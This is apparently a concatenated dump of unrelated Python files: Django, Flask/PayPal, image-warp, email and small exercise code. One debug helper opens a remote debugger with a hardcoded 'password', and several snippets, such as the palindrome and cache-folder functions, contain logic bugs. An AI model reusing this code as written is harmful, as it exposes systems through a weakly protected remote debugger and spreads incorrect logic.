nilq/baby-python
|
python
|
# Copyright (c) 2019 - The Procedural Generation for Gazebo authors
# For information on the respective copyright owner see the NOTICE file
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ..types import XMLBase
from .size import Size
from .normal import Normal
class Plane(XMLBase):
_NAME = 'plane'
_TYPE = 'sdf'
_CHILDREN_CREATORS = dict(
size=dict(creator=Size, default=[2]),
normal=dict(creator=Normal)
)
def __init__(self):
XMLBase.__init__(self)
self.reset()
@property
def size(self):
return self._get_child_element('size')
@size.setter
def size(self, vec):
self._add_child_element('size', vec)
@property
def normal(self):
return self._get_child_element('normal')
@normal.setter
def normal(self, vec):
self._add_child_element('normal', vec)
|
nilq/baby-python
|
python
|
# Generated by Django 2.2.5 on 2019-11-21 01:48
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Search',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('query', models.CharField(max_length=100)),
('search_count', models.PositiveIntegerField(default=1)),
('timestamp', models.DateTimeField(auto_now_add=True)),
],
options={
'verbose_name': 'Search',
'verbose_name_plural': 'searches',
},
),
]
|
nilq/baby-python
|
python
|
import os
import sys
import tempfile
import mimetypes
import webbrowser
# Import the email modules we'll need
from email import policy
from email.parser import BytesParser
# An imaginary module that would make this work and be safe.
from imaginary import magic_html_parser
# In a real program you'd get the filename from the arguments.
msg = BytesParser(policy=policy.default).parse(open('outgoing.msg', 'rb'))
# Now the header items can be accessed as a dictionary, and any non-ASCII will
# be converted to unicode:
print('To:', msg['to'])
print('From:', msg['from'])
print('Subject:', msg['subject'])
# If we want to print a priview of the message content, we can extract whatever
# the least formatted payload is and print the first three lines. Of course,
# if the message has no plain text part printing the first three lines of html
# is probably useless, but this is just a conceptual example.
simplest = msg.get_body(preferencelist=('plain', 'html'))
print()
print(''.join(simplest.get_content().splitlines(keepends=True)[:3]))
ans = input("View full message?")
if ans.lower()[0] == 'n':
sys.exit()
# We can extract the richest alternative in order to display it:
richest = msg.get_body()
partfiles = {}
if richest['content-type'].maintype == 'text':
if richest['content-type'].subtype == 'plain':
for line in richest.get_content().splitlines():
print(line)
sys.exit()
elif richest['content-type'].subtype == 'html':
body = richest
else:
print("Don't know how to display {}".format(richest.get_content_type()))
sys.exit()
elif richest['content-type'].content_type == 'multipart/related':
body = richest.get_body(preferencelist=('html'))
for part in richest.iter_attachments():
fn = part.get_filename()
if fn:
extension = os.path.splitext(part.get_filename())[1]
else:
extension = mimetypes.guess_extension(part.get_content_type())
with tempfile.NamedTemporaryFile(suffix=extension, delete=False) as f:
f.write(part.get_content())
# again strip the <> to go from email form of cid to html form.
partfiles[part['content-id'][1:-1]] = f.name
else:
print("Don't know how to display {}".format(richest.get_content_type()))
sys.exit()
with tempfile.NamedTemporaryFile(mode='w', delete=False) as f:
# The magic_html_parser has to rewrite the href="cid:...." attributes to
# point to the filenames in partfiles. It also has to do a safety-sanitize
# of the html. It could be written using html.parser.
f.write(magic_html_parser(body.get_content(), partfiles))
webbrowser.open(f.name)
os.remove(f.name)
for fn in partfiles.values():
os.remove(fn)
# Of course, there are lots of email messages that could break this simple
# minded program, but it will handle the most common ones.
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
My first warp!
Using scikit-image piecewise affine transformation,
based on manual node assignment with stable corners.
A midpoint morph (halfway between the key frames) is generated.
http://scikit-image.org/docs/dev/auto_examples/plot_piecewise_affine.html
"""
############
# Settings #
############
home = r'/Users/jasper/Documents/PythonSpul/muddymorph/testcases'
key_a = home + r'/ball1.jpg'
key_b = home + r'/ball2.jpg'
nodefile = home + r'/ball_nodeclick.csv'
################
# Dependencies #
################
# Open source
import numpy as np
import matplotlib.pyplot as plt
from skimage.transform import PiecewiseAffineTransform, warp
# Home grown
import muddymorph_algo as algo
########
# Warp #
########
# Make an announcement
print("")
print("MuddyMorph Warp Proto 1")
print("=======================")
print("")
# Load data
print("Loading images and coordinates ... ", end="")
Ka = algo.load_rgba(key_a)
Kb = algo.load_rgba(key_b)
h, w = Ka.shape[:2]
nodes = np.loadtxt(nodefile, delimiter=',').astype(int)
print("done")
# Add edges to node paths
for x in [0, w - 1]:
for y in [0, h - 1]:
nodes = np.row_stack((nodes, [x, y, x, y]))
# Source and destination coordinates
print("Warping like crazy ... ", end="")
pa = nodes[:, 0:2]
pb = nodes[:, 2:4]
pi = pa + 0.5 * (pb - pa)
# Transform A
Ta = PiecewiseAffineTransform()
Ta.estimate(pi, pa)
Wa = warp(Ka, Ta)
# Transform B
dst_b = pb + 0.5 * (pa - pb)
Tb = PiecewiseAffineTransform()
Tb.estimate(pi, pb)
Wb = warp(Kb, Tb)
print("done")
##########
# Review #
##########
# Show plain images
print("Plotting input ... ", end="")
plt.close('all')
fig = algo.big_figure('MuddyMorph Proto - Warp 1', w * 3, h * 2)
plt.subplot(2, 3, 1)
plt.imshow(Ka)
plt.axis('image')
plt.plot(nodes[:, 0], nodes[:, 1], 'r+')
plt.title('A plain', fontweight='bold')
plt.subplot(2, 3, 2)
plt.imshow(Kb)
plt.axis('image')
plt.plot(nodes[:, 2], nodes[:, 3], 'r+')
plt.title('B plain', fontweight='bold')
plt.subplot(2, 3, 3)
plt.imshow(0.5 * Ka + 0.5 * Kb)
plt.axis('image')
plt.title('A&B plain', fontweight='bold')
print("done")
# Show warped images
print("Plotting result ... ", end="")
plt.subplot(2, 3, 4)
plt.imshow(Wa)
plt.axis('image')
plt.plot(pi[:, 0], pi[:, 1], 'r+')
plt.title('A warp', fontweight='bold')
plt.subplot(2, 3, 5)
plt.imshow(Wb)
plt.axis('image')
plt.plot(pi[:, 0], pi[:, 1], 'r+')
plt.title('B warp', fontweight='bold')
plt.subplot(2, 3, 6)
plt.imshow(0.5 * Wa + 0.5 * Wb)
plt.axis('image')
plt.title('A&B plain', fontweight='bold')
print("done")
|
nilq/baby-python
|
python
|
# Copyright (c) 2006-2013 Regents of the University of Minnesota.
# For licensing terms, see the file LICENSE.
import os
import sys
import re
import traceback
# This is the global namespace.
# 2011.04.19: g.log is the only member of the global namespace. I think there
# were bigger plans for g.py, but it's only ever housed the logger.
# See: conf.py, which sets g.log = logging.
# 2011.08.19: Import pyserver_glue so we get os.environ['PYSERVER_HOME'].
# 2013.04.20: pyserver_glue no longer sets os.environ['PYSERVER_HOME'], but
# we no longer use it. Also, it should still be the first element
# of sys.path[].
import pyserver_glue
# 2011.01.23: Adding g.assurt so we can show a proper stack trace
ignore_stack_re = re.compile(r'^\s*raise Ccp_Assert\(message\)$')
class Ccp_Assert(AssertionError):
def __init__(self, message):
if not message:
# NO! prints to stderr or something: message = traceback.print_stack()
#message = traceback.format_exc()
strip_stack = False
stack_lines_ = traceback.format_stack()
stack_lines = []
for lines in stack_lines_:
for line in lines.split('\n'):
if line:
#log.debug('Ccp_Assert: line: %s' % (line,))
if ignore_stack_re.match(line) is not None:
#import pdb; pdb.set_trace()
# "raise Ccp_Assert(message)" is actually secondtolast ln
# The line before is, e.g.,
# File "/ccp/dev/cp_1051/pyserver/g.py", ln 36, in assurt
try:
stack_lines.pop()
except IndexError:
log.error('Ccp_Assert: empty list?')
strip_stack = True
break
stack_lines.append(line)
if strip_stack:
break
message = '\n'.join(stack_lines)
#Exception.__init__(self, message)
AssertionError.__init__(self, message)
#log.error('Ccp_Assert: %s' % (message,))
#traceback.print_exception(*sys.exc_info())
debug_me = False
#debug_me = True
# FIXME: Should we check either of these, i.e., for cron jobs?
#Apr-20 20:40:20 DEBG schema-up # os.getenv("LOGNAME"): landonb
#Apr-20 20:40:20 DEBG schema-up # os.environ.get("TERM"): xterm
# From pyserver, Fedora:
# os.getenv('LOGNAME') is None
# os.getenv('TERM') is 'xterm'
# {'LANG': 'C',
# 'TERM': 'xterm',
# 'SHLVL': '2',
# 'INSTANCE': 'minnesota',
# 'PWD': '/',
# 'PYSERVER_HOME': '/ccp/dev/cp_nnnn/pyserver',
# 'PATH': '/sbin:/usr/sbin:/bin:/usr/bin',
# '_': '/usr/sbin/httpd'}
iamwhoiam = True
# NOTE: os.getenv same as os.environ.get. Type os.environ to see all.
if ((os.getenv('APACHE_RUN_USER') == 'www-data') # Ubuntu apache service
or (os.getenv('_') == '/usr/sbin/httpd') # Fedora apache service
or (os.getenv('LOGNAME') == 'www-data') # Ubuntu routed/mr_do service
or (os.getenv('LOGNAME') == 'apache')): # Fedora routed/mr_do service
# FIXME: What are the mr_do/routed services under Ubuntu?
iamwhoiam = False
# NOTE: If starting as a service, cannot import rpdb2 here.
# 'cause the cwd is '.'. After pyserver_glue runs, it'll
# be corrected, so the import is in the assurt fcn.
# The 'assert' keyword is reserved, so we call it, uh, 'syrt!
def assurt(condit, message=None, soft=False):
if not bool(condit):
# FIXME: This doesn't work if being run as a service. Can you figure out
# if we're a daemon and throw a normal assert instead?
if debug_me:
log.warning('DEBUGGING!!')
print 'DEBUGGING!!'
if iamwhoiam:
import pdb; pdb.set_trace()
else:
log.warning('Waiting for remote debug client...')
print 'Waiting for remote debug client...'
import rpdb2
rpdb2.start_embedded_debugger('password', fAllowRemote=True)
assrt = Ccp_Assert(message)
if not soft:
raise assrt
else:
log.error('Soft Assert: %s' % (str(assrt),))
#
def assurt_soft(condit, message=None):
assurt(condit, message, soft=True)
#
# Some debugging hints:
#
# Start the remote debugger
# -------------------------
#
# In one terminal window,
#
# $ cd /ccp/dev/cp/pyserver/bin/winpdb ; py rpdb2.py
# > password password
#
# In your code, start a debug session where you want to break,
#
# import rpdb2
# rpdb2.start_embedded_debugger('password', fAllowRemote=True)
#
# And then back in your terminal window, find the list of
# waiting sessions,
#
# > attach
# Connecting to 'localhost'...
# Scripts to debug on 'localhost':
#
# pid name
# --------------------------
# 28969 /ccp/dev/cp/pyserver/g.py
#
# > attach 28969
# ...
#
# Start a local debugger
# ----------------------
#
# If you're just running a script (and not pyserver via apache),
# insert a simple pdb break into your code,
#
# import pdb;pdb.set_trace()
#
# You can also use a safer, user-specific mechanism, e.g.,
#
# conf.break_here('ccpv3')
#
# ***
class Ccp_Shutdown(Exception):
'''An error telling the code to cleanup as quickly as possible.'''
def __init__(self, message=''):
Exception.__init__(self, message)
#
def check_keep_running(keep_running):
if (keep_running is not None) and (not keep_running.isSet()):
raise Ccp_Shutdown()
# ***
if (__name__ == '__main__'):
pass
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
""" contest forms: HTTP form processing for contest pages
:copyright: Copyright (c) 2014 Bivio Software, Inc. All Rights Reserved.
:license: Apache, see LICENSE for more details.
"""
import decimal
import re
import sys
import flask
import flask_mail
import flask_wtf
import paypalrestsdk
import paypalrestsdk.exceptions
import wtforms
import wtforms.validators as wtfv
from . import model as pcm
from .. import common
from .. import controller as ppc
from ..auth import model as pam
class Contestant(flask_wtf.Form):
"""Project submission form.
Fields:
display_name: project name
contestant_desc: project summary
youtube_url: full YouTube video url
slideshow_url: full SlideShare url
founder_desc: current user's founder info for this project
website: project website (optional)
"""
display_name = wtforms.StringField(
'Legal Name of Business', validators=[
wtfv.DataRequired(), wtfv.Length(max=100)])
contestant_desc = wtforms.TextAreaField(
'Summary of Business, Product and/or Service',
validators=[wtfv.DataRequired(), wtfv.Length(max=10000)])
youtube_url = wtforms.StringField(
'YouTube Video URL', validators=[
wtfv.DataRequired(), wtfv.Length(max=500)])
slideshow_url = wtforms.StringField(
'SlideShare Pitch Deck URL', validators=[
wtfv.DataRequired(), wtfv.Length(max=500)])
founder_desc = wtforms.TextAreaField(
'Your Bio', validators=[wtfv.DataRequired(), wtfv.Length(max=10000)])
website = wtforms.StringField(
'Business Website', validators=[wtfv.Length(max=100)])
tax_id = wtforms.StringField(
'Business US Tax Id', validators=[
wtfv.DataRequired(), wtfv.Length(max=30)])
business_phone = wtforms.StringField(
'Business Phone', validators=[
wtfv.DataRequired(), wtfv.Length(max=100)])
business_address = wtforms.TextAreaField(
'Business Mailing Address', validators=[
wtfv.DataRequired(), wtfv.Length(max=500)])
agree_to_terms = wtforms.BooleanField(
'Agree to Terms of Service', validators=[wtfv.DataRequired()])
founder2_name = wtforms.StringField(
'Other Founder Name', validators=[wtfv.Length(max=100)])
founder2_desc = wtforms.TextAreaField(
'Other Founder Bio', validators=[wtfv.Length(max=10000)])
founder3_name = wtforms.StringField(
'Other Founder Name', validators=[wtfv.Length(max=100)])
founder3_desc = wtforms.TextAreaField(
'Other Founder Bio', validators=[wtfv.Length(max=10000)])
def execute(self, contest):
"""Validates and creates the contestant model"""
if self.is_submitted() and self.validate():
contestant = self._update_models(contest)
if contestant:
self._send_mail_to_support(contestant)
flask.flash(
'Thank you for submitting your entry. You will be '
'contacted by email when your entry has been reviewed.')
return flask.redirect(contest.format_uri('contestants'))
return contest.task_class.get_template().render_template(
contest,
'submit',
form=self,
selected_menu_action='submit-contestant'
)
def validate(self):
"""Performs superclass wtforms validation followed by url
field validation"""
super(Contestant, self).validate()
self._validate_youtube()
self._validate_slideshare()
self._validate_website()
common.log_form_errors(self)
return not self.errors
def _add_founder(self, contestant, founder):
"""Creates the founder and links it to the contestant."""
ppc.db.session.add(founder)
ppc.db.session.flush()
ppc.db.session.add(
pam.BivAccess(
source_biv_id=contestant.biv_id,
target_biv_id=founder.biv_id
)
)
def _add_founders(self, contestant):
"""Add the current user as a founder and any optional founders."""
founder = pcm.Founder()
self.populate_obj(founder)
founder.display_name = flask.session['user.display_name']
self._add_founder(contestant, founder)
ppc.db.session.add(
pam.BivAccess(
source_biv_id=flask.session['user.biv_id'],
target_biv_id=founder.biv_id
)
)
if self.founder2_name.data:
self._add_founder(contestant, pcm.Founder(
display_name=str(self.founder2_name.data),
founder_desc=str(self.founder2_desc.data),
))
if self.founder3_name.data:
self._add_founder(contestant, pcm.Founder(
display_name=str(self.founder3_name.data),
founder_desc=str(self.founder3_desc.data),
))
def _send_mail_to_support(self, contestant):
"""Send a notification to support for a new entry"""
ppc.mail().send(flask_mail.Message(
'New Entry Submitted: {}'.format(contestant.biv_id),
recipients=[ppc.app().config['PUBLICPRIZE']['SUPPORT_EMAIL']],
# TODO(pjm): requires new Flask-Mail for unicode on python 3
# body='Submitted by: {} {}\nTitle: {}\nReview URL: {}'.format(
# flask.session['user.display_name'],
# pam.User.query.filter_by(
# biv_id=flask.session['user.biv_id']
# ).one().user_email,
# contestant.display_name,
# contestant.format_absolute_uri()
# )
body='Submitted by: {}\nReview URL: {}'.format(
pam.User.query.filter_by(
biv_id=flask.session['user.biv_id']
).one().user_email,
contestant.format_absolute_uri()
)
))
def _slideshare_code(self):
"""Download slideshare url and extract embed code.
The original url may not have the code.
ex. www.slideshare.net/Micahseff/game-xplain-pitch-deck-81610
Adds field errors if the code can not be determined.
"""
html = common.get_url_content(self.slideshow_url.data)
if not html:
self.slideshow_url.errors = [
'SlideShare URL invalid or unavailable.']
return None
match = re.search(r'slideshow/embed_code/(\d+)', html)
if match:
return match.group(1)
self.slideshow_url.errors = [
'Embed code not found on SlideShare page.']
return None
def _update_models(self, contest):
"""Creates the Contestant and Founder models
and adds BivAccess models to join the contest and Founder models"""
contestant = pcm.Contestant()
self.populate_obj(contestant)
contestant.youtube_code = self._youtube_code()
contestant.slideshow_code = self._slideshare_code()
contestant.is_public = \
ppc.app().config['PUBLICPRIZE']['ALL_PUBLIC_CONTESTANTS']
contestant.is_under_review = False
ppc.db.session.add(contestant)
ppc.db.session.flush()
ppc.db.session.add(
pam.BivAccess(
source_biv_id=contest.biv_id,
target_biv_id=contestant.biv_id
)
)
self._add_founders(contestant)
return contestant
def _youtube_code(self):
"""Ensure the youtube url contains a VIDEO_ID"""
value = self.youtube_url.data
# http://youtu.be/a1Y73sPHKxw
# or https://www.youtube.com/watch?v=a1Y73sPHKxw
if re.search(r'\?', value) and re.search(r'v\=', value):
match = re.search(r'(?:\?|\&)v\=(.*?)(&|$)', value)
if match:
return match.group(1)
else:
match = re.search(r'\/([^\&\?\/]+)$', value)
if match:
return match.group(1)
return None
def _validate_slideshare(self):
"""Ensures the SlideShare slide deck exists"""
if self.slideshow_url.errors:
return
code = self._slideshare_code()
if code:
if not common.get_url_content(
'http://www.slideshare.net/slideshow/embed_code/' + code):
self.slideshow_url.errors = [
'Unknown SlideShare ID: ' + code + '.']
def _validate_website(self):
"""Ensures the website exists"""
if self.website.errors:
return
if self.website.data:
if not common.get_url_content(self.website.data):
self.website.errors = ['Website invalid or unavailable.']
def _validate_youtube(self):
"""Ensures the YouTube video exists"""
if self.youtube_url.errors:
return
code = self._youtube_code()
if code:
html = common.get_url_content('http://youtu.be/' + code)
# TODO(pjm): need better detection for not-found page
if not html or re.search(r'<title>YouTube</title>', html):
self.youtube_url.errors = [
'Unknown YouTube VIDEO_ID: ' + code + '.']
else:
self.youtube_url.errors = ['Invalid YouTube URL.']
class Donate(flask_wtf.Form):
"""Donation form.
Fields:
amount: donation amount
"""
# TODO(pjm): DecimalField doesn't accept '' value...
amount = wtforms.StringField('Contribution Amount')
donate5 = wtforms.SubmitField('$5')
donate25 = wtforms.SubmitField('$25')
donate100 = wtforms.SubmitField('$100')
other_amount = wtforms.SubmitField('Other Amount')
def execute(self, contestant):
"""Validates and redirects to PayPal
For test credit card payments, use card number: 4736656842918643
"""
if self.is_submitted() and self.validate():
url = self._paypal_payment(contestant)
if url:
return flask.redirect(url)
contest = contestant.get_contest()
return contest.task_class.get_template().render_template(
contest,
'detail',
contestant=contestant,
contestant_url=contestant.format_absolute_uri(),
contestant_tweet="Help us win! " + contestant.display_name,
form=self,
)
def execute_payment(self, contestant):
"""Handles return task from paypal. Calls paypal with payment and
payer IDs to complete the transaction."""
donor = pcm.Donor.unsafe_load_from_session()
if not donor:
ppc.app().logger.warn('missing session donor')
flask.flash('The referenced contribution was already processed.')
return flask.redirect(contestant.format_uri())
self._save_payment_info_to_donor(donor)
payment = paypalrestsdk.Payment({
'id': donor.paypal_payment_id
})
donor.remove_from_session()
try:
if payment.execute({'payer_id': donor.paypal_payer_id}):
donor.donor_state = 'executed'
ppc.db.session.add(donor)
return flask.redirect(contestant.format_uri('thank-you'))
else:
ppc.app().logger.warn('payment execute failed')
except paypalrestsdk.exceptions.ClientError as err:
ppc.app().logger.warn(err)
except:
ppc.app().logger.warn(sys.exc_info()[0])
return flask.redirect(contestant.format_uri())
def validate(self):
"""Ensure the amount is present and at least $10"""
super(Donate, self).validate()
amount = None
if self.donate5.data:
amount = 5
elif self.donate25.data:
amount = 25
elif self.donate100.data:
amount = 100
elif self.amount.data:
try:
if float(self.amount.data) < 10:
self.amount.errors = ['Amount must be at least $10.']
elif float(self.amount.data) > 1000000:
self.amount.errors = ['Amount too large.']
except ValueError:
self.amount.errors = ['Please enter an amount.']
else:
self.amount.errors = ['Please enter an amount.']
self.amount.raw_data = None
if amount:
self.amount.data = decimal.Decimal(amount)
common.log_form_errors(self)
return not self.errors
def _create_donor(self, contestant):
"""Create a new donor model and link to the parent contestant."""
donor = pcm.Donor()
self.populate_obj(donor)
donor.donor_state = 'submitted'
ppc.db.session.add(donor)
ppc.db.session.flush()
ppc.db.session.add(
pam.BivAccess(
source_biv_id=contestant.biv_id,
target_biv_id=donor.biv_id
)
)
return donor
def _link_donor_to_user(self, donor):
"""Link the donor model to a user model. Match the donor email with
the user. If no match, use the current user, if present."""
if pam.BivAccess.query.select_from(pam.User).filter(
pam.BivAccess.source_biv_id == pam.User.biv_id,
pam.BivAccess.target_biv_id == donor.biv_id
).count() > 0:
return
user = pam.User.query.filter_by(user_email=donor.donor_email).first()
if not user and flask.session.get('user.is_logged_in'):
user = pam.User.query.filter_by(
biv_id=flask.session['user.biv_id']
).one()
if not user:
return
ppc.db.session.add(
pam.BivAccess(
source_biv_id=user.biv_id,
target_biv_id=donor.biv_id
)
)
def _paypal_payment(self, contestant):
"""Call paypal server to create payment record.
Returns a redirect link to paypal site or None on error."""
donor = self._create_donor(contestant)
amount = '%.2f' % float(self.amount.data)
payment = paypalrestsdk.Payment({
'intent': 'sale',
'payer': {
'payment_method': 'paypal'
},
'redirect_urls': {
'return_url': contestant.format_absolute_uri('donate-done'),
'cancel_url': contestant.format_absolute_uri('donate-cancel'),
},
'transactions': [
{
'amount': {
'total': amount,
'currency': 'USD',
},
'item_list': {
'items': [
{
'quantity': 1,
'price': amount,
'currency': 'USD',
'name': '{} contribution, {}'.format(
contestant.display_name,
contestant.get_contest().display_name),
'tax': 0
}
]
}
}
]
})
try:
if payment.create():
ppc.app().logger.info(payment)
donor.paypal_payment_id = str(payment.id)
donor.add_to_session()
for link in payment.links:
if link.method == 'REDIRECT':
return str(link.href)
else:
ppc.app().logger.warn(payment.error)
except paypalrestsdk.exceptions.ClientError as err:
ppc.app().logger.warn(err)
except:
ppc.app().logger.warn(sys.exc_info()[0])
self.amount.errors = [
'There was an error processing your contribution.']
return None
def _save_payment_info_to_donor(self, donor):
"""Get payer info from paypal server, save info to Donor model."""
try:
payment = paypalrestsdk.Payment.find(donor.paypal_payment_id)
info = payment.payer.payer_info
donor.donor_email = info.email
donor.display_name = info.first_name + ' ' + info.last_name
except paypalrestsdk.exceptions.ConnectionError as err:
ppc.app().logger.warn(err)
donor.paypal_payer_id = flask.request.args['PayerID']
donor.donor_state = 'pending_confirmation'
ppc.db.session.add(donor)
self._link_donor_to_user(donor)
class Judgement(flask_wtf.Form):
"""Judgement form.
Fields:
question(1 .. 6): question score
question(1 ..6)_comment: comments for survey question
general_comment: End of survey comments
"""
def _comment_field(label='Comments'):
return wtforms.TextAreaField(
label, validators=[wtfv.Length(max=10000)])
def _question_field(number):
return wtforms.RadioField(
'Question {}'.format(number),
choices=[
('1', 'Unsatisfactory'),
('2', 'Improvement Needed'),
('3', 'Meets Expectations'),
('4', 'Exceeds Expectations')
]
)
question1 = _question_field('1')
question1_comment = _comment_field()
question2 = _question_field('2')
question2_comment = _comment_field()
question3 = _question_field('3')
question3_comment = _comment_field()
question4 = _question_field('4')
question4_comment = _comment_field()
question5 = _question_field('5')
question5_comment = _comment_field()
question6 = _question_field('6')
question6_comment = _comment_field()
general_comment = _comment_field('General Comments')
def execute(self, contestant):
"""Saves scores for questions."""
contest = contestant.get_contest()
if self.is_submitted():
if self.validate():
self._save_scores(contestant)
flask.flash('Thank you for scoring contestant {}.'.format(
contestant.display_name))
return flask.redirect(
contest.format_uri('judging'))
else:
self._load_scores(contestant)
return contest.task_class.get_template().render_template(
contest,
'judge-contestant',
sub_base_template=contest.task_class.get_template().base_template('detail'),
contestant=contestant,
form=self
)
@classmethod
def get_points_for_question(cls, number):
return pcm.JudgeScore.get_points_for_question(number)
@classmethod
def get_text_for_question(cls, number):
return pcm.JudgeScore.get_text_for_question(number)
def validate(self):
"""Clear any errors for unselected radio choices."""
super(Judgement, self).validate()
for num in range(1, 7):
self['question{}'.format(num)].errors = None
common.log_form_errors(self)
return not self.errors
def _load_scores(self, contestant):
"""Load scores from database."""
for num in range(1, 7):
score = self._unsafe_get_score(contestant, num)
if not score:
continue
self['question{}'.format(num)].data = str(score.judge_score)
self['question{}_comment'.format(num)].data = score.judge_comment
question0 = self._unsafe_get_score(contestant, 0)
if score:
self.general_comment.data = question0.judge_comment
def _save_score(self, contestant, num, val, comment):
"""Save a question score to database."""
score = self._unsafe_get_score(contestant, num)
if not score:
score = pcm.JudgeScore()
score.judge_biv_id = flask.session['user.biv_id']
score.contestant_biv_id = contestant.biv_id
score.question_number = int(num)
score.judge_score = int(val)
score.judge_comment = comment
ppc.db.session.add(score)
def _save_scores(self, contestant):
"""Saves scores to database."""
for num in range(1, 7):
val = self['question{}'.format(num)].data
# TODO(pjm): hack - val may have been coerced to string "None"
if val is None or val == 'None':
val = 0
self._save_score(contestant, num, val,
str(self['question{}_comment'.format(num)].data))
self._save_score(contestant, 0, 0, str(self.general_comment.data))
def _unsafe_get_score(self, contestant, num):
"""Loads a question score from database."""
return pcm.JudgeScore.query.filter_by(
judge_biv_id=flask.session['user.biv_id'],
contestant_biv_id=contestant.biv_id,
question_number=int(num)
).first()
|
nilq/baby-python
|
python
|
import sqlite3
import os
import urllib.request
from urllib.error import *
DATABASE_PATH = 'database/card_image_database.db'
def create_card_image_database(print_function):
print_function('Creating Database.')
if os.path.exists(DATABASE_PATH):
try:
os.remove(DATABASE_PATH)
except OSError as e:
print('Error while deleting file', DATABASE_PATH)
print(e)
conn = sqlite3.connect(DATABASE_PATH)
c = conn.cursor()
print_function('Creating Table.')
c.execute("""CREATE TABLE cards (
card_id integer,
card_image blob
)""")
conn.commit()
print_function('Retrieving Card IDs.')
conn_card = sqlite3.connect('database/card_database.db')
conn_card.row_factory = lambda cursor, row: row[0]
c_card = conn_card.cursor()
card_ids = c_card.execute('SELECT card_id FROM cards').fetchall()
num_of_cards = len(card_ids)
print_function('Inserting Card Images.')
for index, card_id in enumerate(card_ids):
try:
card_image_url = "https://shadowverse-portal.com/image/card/phase2/common/L/L_" + str(card_id) + ".jpg"
with urllib.request.urlopen(card_image_url) as response:
data = response.read()
insert_card_image(card_id, data, conn, c)
except TimeoutError:
print_function('Downloading image failed. Update database to try again.')
return
except URLError:
print_function('Unable to reach website. Please check internet connection.')
return
print_function('Inserted ' + str(index + 1) + ' out of ' + str(num_of_cards) + ' images.')
print_function('Completed')
conn.close()
def update_card_image_database(print_function):
if not os.path.exists(DATABASE_PATH):
create_card_image_database(print_function)
return
print_function('Accessing Database.')
conn = sqlite3.connect(DATABASE_PATH)
conn.row_factory = lambda cursor, row: row[0]
c = conn.cursor()
image_card_ids = c.execute('SELECT card_id FROM cards').fetchall()
print_function('Retrieving Card IDs.')
conn_card = sqlite3.connect('database/card_database.db')
conn_card.row_factory = lambda cursor, row: row[0]
c_card = conn_card.cursor()
card_card_ids = c_card.execute('SELECT card_id FROM cards').fetchall()
num_of_cards = len(card_card_ids)
print_function('Inserting Card Images.')
for index, card_id in enumerate(card_card_ids):
if card_id not in image_card_ids:
try:
card_image_url = "https://shadowverse-portal.com/image/card/phase2/common/L/L_" + str(card_id) + ".jpg"
with urllib.request.urlopen(card_image_url) as response:
data = response.read()
insert_card_image(card_id, data, conn, c)
except TimeoutError:
print_function('Downloading image failed. Update database to try again.')
return
except URLError:
print_function('Unable to reach website. Please check internet connection.')
return
print_function('Inserted ' + str(index + 1) + ' out of ' + str(num_of_cards) + ' images.')
print_function('Completed')
conn.close()
def insert_card_image(card_id_number, card_image, conn, cursor):
with conn:
cursor.execute("""INSERT INTO cards VALUES (
:card_id,
:card_image
)""",
{
'card_id': card_id_number,
'card_image': card_image
})
|
nilq/baby-python
|
python
|
/home/runner/.cache/pip/pool/37/a3/2b/4c0a8aea5f52564ead5b0791d74f0f33c3a5eea3657f257e9c770b86c6
|
nilq/baby-python
|
python
|
'''
Largest Palindrome of two N-digit numbers given
N = 1, 2, 3, 4
'''
def largePali4digit():
answer = 0
for i in range(9999, 1000, -1):
for j in range(i, 1000, -1):
k = i * j
s = str(k)
if s == s[::-1] and k > answer:
return i, j
def largePali3digit():
answer = 0
for i in range(999, 100, -1):
for j in range(i, 100, -1):
k = i * j
s = str(k)
if s == s[::-1] and k > answer:
return i, j
def largePali2digit():
answer = 0
for i in range(99, 10, -1):
for j in range(i, 10, -1):
k = i * j
s = str(k)
if s == s[::-1] and k > answer:
return i, j
def largePali1digit():
answer = 0
for i in range(9, 1, -1):
for j in range(i, 1, -1):
k = i * j
s = str(k)
if s == s[::-1] and k > answer:
return i, j
print(largePali3digit())
print(largePali2digit())
print(largePali1digit())
print(largePali4digit())
|
nilq/baby-python
|
python
|
import os
import tempfile
from os import makedirs
from os.path import join, exists
from sys import platform
def get_home_folder():
from pathlib import Path
home_folder = f"{Path.home()}"
return home_folder
def get_temp_folder():
temp_folder = None
if platform == "linux" or platform == "linux2":
temp_folder = tempfile.gettempdir()
elif platform == "darwin":
temp_folder = tempfile.gettempdir()
elif platform == "win32":
temp_folder = tempfile.gettempdir()
try:
makedirs(temp_folder)
except Exception:
pass
if exists(temp_folder):
return temp_folder
else:
return None
def get_cache_folder():
cache_folder = None
if platform == "linux" or platform == "linux2":
cache_folder = join(get_home_folder(), '.cache')
elif platform == "darwin":
cache_folder = join(get_home_folder(), '/Library/Caches')
elif platform == "win32":
cache_folder = join(get_home_folder(), os.getenv('LOCALAPPDATA'))
try:
makedirs(cache_folder)
except Exception:
pass
if exists(cache_folder):
return cache_folder
else:
return None
|
nilq/baby-python
|
python
|
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, val=0, next=None):
# self.val = val
# self.next = next
class Solution:
def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:
def addTwoNumbers(list1, list2, node, digit):
n = digit
if (list1 != None):
n += list1.val
if (list2 != None):
n += list2.val
q = n // 10
r = n % 10
node.val = r
node.next = None
if (list1 == None):
next_list1 = None
else:
next_list1 = list1.next
if (list2 == None):
next_list2 = None
else:
next_list2 = list2.next
if (next_list1 == None and next_list2 == None and q == 0):
return
node.next = ListNode(0)
addTwoNumbers(next_list1, next_list2, node.next, q)
startNode = ListNode(0)
addTwoNumbers(l1, l2, startNode, 0)
return startNode
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from chai import Chai
from arrow import arrow, locales
class ModuleTests(Chai):
def test_get_locale(self):
mock_locales = self.mock(locales, "_locales")
mock_locale_cls = self.mock()
mock_locale = self.mock()
